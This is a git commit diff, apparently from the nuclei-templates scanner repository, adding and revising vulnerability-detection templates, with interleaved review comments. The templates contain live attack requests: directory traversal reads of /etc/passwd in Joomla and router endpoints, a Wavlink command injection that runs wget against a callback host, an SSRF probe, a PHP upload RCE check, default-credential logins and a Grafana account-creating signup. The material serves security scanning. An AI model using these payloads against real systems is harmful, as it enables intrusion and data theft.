Merge remote-tracking branch 'origin/master' into dynamic_attributes

patch-1
forgedhallpass 2021-08-20 15:34:08 +03:00
commit dc4cc62629
18 changed files with 175 additions and 80 deletions


@ -26,7 +26,7 @@ jobs:
env:
GO111MODULE: on
run: |
go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei
shell: bash
- name: Template Validation
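Review bot: The replacement `go get` line drops the `@dev` suffix without pinning anything in its place, so the validation step installs whatever tag resolves as latest on the day the workflow runs, and a regression in a new nuclei release surfaces here as spurious template failures that are hard to reproduce. Pin the engine explicitly, e.g. `go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@<pinned-release-tag>` (placeholder), and bump it deliberately. If the runner's Go is 1.17 or newer, `go install <module>@<version>` is the supported form for installing a command, since `go get` for binaries is deprecated there. The enclosing job and the steps before `env:` are outside the hunk.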


@ -0,0 +1,27 @@
id: CVE-2010-1533
info:
name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12142
- https://www.cvedetails.com/cve/CVE-2010-1533
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
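Review bot: The `description` value in this new template is a single plain scalar well over 120 characters, which both yamllint and most reviewers' diff views choke on; the same applies to the CVE-2010-2036 template added in this commit. Write it as a folded block, `description: >-`, with the sentence wrapped underneath, which keeps the runtime value identical. Two smaller consistency points between the two sibling templates: the tag order differs (`cve,cve2010,joomla,lfi` here versus `cve,cve2010,lfi,joomla` in the other), and neither regex matcher names a `part`; an explicit `part: body` makes the intent unambiguous rather than relying on the engine default.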


@ -0,0 +1,27 @@
id: CVE-2010-2036
info:
name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34004
- https://www.cvedetails.com/cve/CVE-2010-2036
tags: cve,cve2010,lfi,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -12,7 +12,6 @@ requests:
- |
POST /rest/issueNav/1/issueTable HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
Connection: Close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
X-Atlassian-Token: no-check


@ -14,16 +14,12 @@ requests:
- |
POST /cgi-bin/login.cgi HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://{{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Connection: close
newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction


@ -15,8 +15,6 @@ requests:
POST /dfsms/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Content-Length: 66


@ -14,8 +14,6 @@ requests:
GET /?qtproxycall=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers-condition: and
matchers:


@ -6,7 +6,7 @@ info:
severity: critical
description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange,oob
tags: cve,cve2021,ssrf,rce,exchange,oob,microsoft
reference:
- https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse


@ -18,24 +18,12 @@ requests:
Host: {{Hostname}}
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
- |
GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
matchers-condition: and
matchers:


@ -0,0 +1,34 @@
id: CVE-2021-38751
info:
name: ExponentCMS <= 2.6 Host Header Injection
author: dwisiswant0
severity: medium
description: |
A HTTP Host header attack exists in ExponentCMS 2.6
and below in /exponent_constants.php. A modified HTTP
header can change links on the webpage to an arbitrary value,
leading to a possible attack vector for MITM.
reference:
- https://github.com/exponentcms/exponent-cms/issues/1544
- https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64
tags: cve,cve2021,exponentcms
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}/login/showlogin"
headers:
Host: "{{randstr}}.tld"
matchers-condition: and
matchers:
- type: regex
regex:
- (EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld
part: body
- type: status
status:
- 200
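Review bot: The regex in the new CVE-2021-38751 template is an unquoted plain scalar that starts with `(` and contains `"`, `?` and `://`; it happens to parse today, but any later edit that introduces `: ` or ` #` silently changes its meaning, and the sibling templates in this repository single-quote their regexes. Quote it: `- '(EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld'`. Note also that because the whole `EXPONENT...=")` group is optional, the matcher reduces to "the injected `{{randstr}}.tld` host appears in any `http(s)://` URL in the body", so the group only changes what is captured, not whether the template fires; if the intent is to require the reflection inside an `EXPONENT.*_URL` assignment, drop the trailing `?`, otherwise the group can be removed for readability.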


@ -1,23 +0,0 @@
id: exchange-login
info:
name: Microsoft Exchange login page
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6739
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/owa/auth/logon.aspx'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Exchange Log In</title>'
- '<title>Microsoft Exchange - Outlook Web Access</title>'
- type: status
status:
- 200


@ -15,7 +15,6 @@ requests:
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9,hi;q=0.8
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
matchers-condition: and
matchers:


@ -0,0 +1,35 @@
id: grafana-public-signup
info:
name: Grafana Public Signup
author: pdteam
severity: medium
tags: grafana,intrusive
requests:
- raw:
- |
POST /api/user/signup/step2 HTTP/1.1
Host: {{Hostname}}
content-type: application/json
Origin: {{BaseURL}}
Referer: {{BaseURL}}
{"username":"nuclei_{{randstr}}","password":"{{randstr_1}}"}
matchers-condition: and
matchers:
- type: word
words:
- "User sign up completed successfully"
- type: word
words:
- "grafana_sess"
- "grafana_user"
condition: and
part: header
- type: status
status:
- 200
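Review bot: The new grafana-public-signup template carries the `intrusive` tag but no `description` or `reference`, so an operator reading `-tags grafana` output has no indication that a successful match means a real account named `nuclei_<random>` was created on the target and is left behind. Add a description under `info` that states this plainly, e.g. `description: Checks whether unauthenticated self-registration is enabled by completing a signup; on success this leaves a user named nuclei_<random> on the target.`, so the side effect is visible before the template is scheduled against production systems. A minor style point in the raw request: `content-type` is lowercase while `Host`, `Origin` and `Referer` are title-cased; use `Content-Type` for consistency with the other raw templates in this commit.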


@ -2,7 +2,7 @@ id: springboot-env
info:
name: Detect Springboot Env Actuator
author: that_juan_,dwisiswant0,wdahlenb
author: that_juan_,dwisiswant0,wdahlenb,philippedelteil
severity: low
description: Sensitive environment variables may not be masked
tags: springboot,exposure
@ -36,5 +36,6 @@ requests:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
- "application/vnd.spring-boot.actuator.v2+json"
condition: or
part: header
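Review bot: The added word `application/vnd.spring-boot.actuator.v2+json` in the second hunk is redundant: word matchers are substring matches and the list already has `condition: or`, so the earlier entry `application/vnd.spring-boot.actuator` already matches any header containing the v1 or v2 media type. Either drop the `.v1+json` and `.v2+json` entries and keep the bare prefix, or, if the narrower entries are meant to document the exact media types seen in the wild, add a comment saying so, e.g. `# the first entry already covers the versioned media types below; kept for documentation`. The rest of the matcher (its `type` and `words:` line) starts outside the hunk.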


@ -2,30 +2,31 @@ id: microsoft-exchange-server-detect
info:
name: Microsoft Exchange Server Detect
author: pikpikcu
author: pikpikcu,dhiyaneshDK
severity: info
reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
description: |
Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
description: Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, using Outlook Web App path data.
tags: microsoft,exchange,tech
requests:
- method: GET
path:
- "{{BaseURL}}/owa/auth/logon.aspx"
matchers-condition: and
matchers-condition: or
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)"
part: all
- type: word
words:
- '<title>Exchange Log In</title>'
- '<title>Microsoft Exchange - Outlook Web Access</title>'
extractors:
- type: kval
part: header
kval:
- X-Owa-Version
- X_Owa_Version
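Review bot: Changing `matchers-condition` from `and` to `or` while keeping the `type: status` / `200` matcher means any server that answers `/owa/auth/logon.aspx` with a 200, including catch-all sites that return 200 for every path, is now reported as Microsoft Exchange, so this detection will produce false positives that propagate into the Exchange CVE workflows keyed on this template. The status check should remain a hard requirement and the two content checks should be the alternatives: merge the title words into the regex matcher as additional patterns (a matcher's own list is evaluated with `or` by default) and restore `matchers-condition: and`. The extractor block below is unaffected.
```yaml
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: all
        regex:
          - "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)"
          - '<title>(Exchange Log In|Microsoft Exchange - Outlook Web Access)</title>'
    # … unchanged: extractors …
```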


@ -0,0 +1,26 @@
id: caucho-resin-info-disclosure
info:
name: Caucho Resin Information Disclosure
author: pikpikcu
severity: info
reference: https://www.exploit-db.com/exploits/27888
requests:
- method: GET
path:
- "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" # Version: 3.0.17/3.0.18
- "{{BaseURL}}/%20../web-inf/web.xml" # Version: 3.1.1
matchers-condition: and
matchers:
- type: word
words:
- "<web-app"
- "</web-app>"
part: body
condition: and
- type: status
status:
- 200
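Review bot: The new caucho-resin-info-disclosure template has no `tags` and no `description` under `info`, unlike every other template touched in this commit, so it is never selected by tag-driven runs (`-tags exposure`, `-tags resin`) and a match gives the operator no context beyond the name. Add both, e.g. `tags: caucho,resin,exposure` (constructed example; follow the repository's tag vocabulary) and `description: Resin documentation viewer and path-traversal variants expose WEB-INF descriptors; the two paths target the versions noted inline.` The inline `# Version:` comments on the two paths are useful; a single comment per path with two spaces before `#` is the yamllint-clean form they already nearly follow.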


@ -24,26 +24,19 @@ requests:
<?php echo md5('rce_test');?>
----------------------------835846770881083140190633--
- |
GET /Public/Uploads{{url_decode("§path§")}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
extractors:
- type: regex
name: path
group: 1
internal: true
part: body
regex:
- '/Uploads\\(.*?)"\,"success"'
matchers-condition: and
matchers:
- type: word
words:
- '3c7cb9f46815a790686b857fdbc4295a'
- '"url":"http:'
- '"success":1'
condition: and
- type: status
status:
- 200
- 200
extractors:
- type: json
json:
- '.url'
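Review bot: The new `json` extractor pulls `.url` from the upload response, but the word matcher that gates it still requires the literal `"url":"http:`, which fails when the target returns an `https:` URL; with `condition: and` on that matcher, the whole template then reports nothing even though the upload succeeded and the md5 marker is present. Relaxing the word to `- '"url":"http'` keeps the check for an absolute URL without fixing the scheme. The raw multipart request this hunk belongs to starts above the hunk, and whether `.url` is the right JSON path depends on the response body shape, which is not visible here.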


@ -6,12 +6,8 @@ info:
description: A simple workflow that runs all Grafana related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: exposed-panels/grafana-detect.yaml
subtemplates:
- template: default-logins/grafana/grafana-default-credential.yaml
- tags: grafana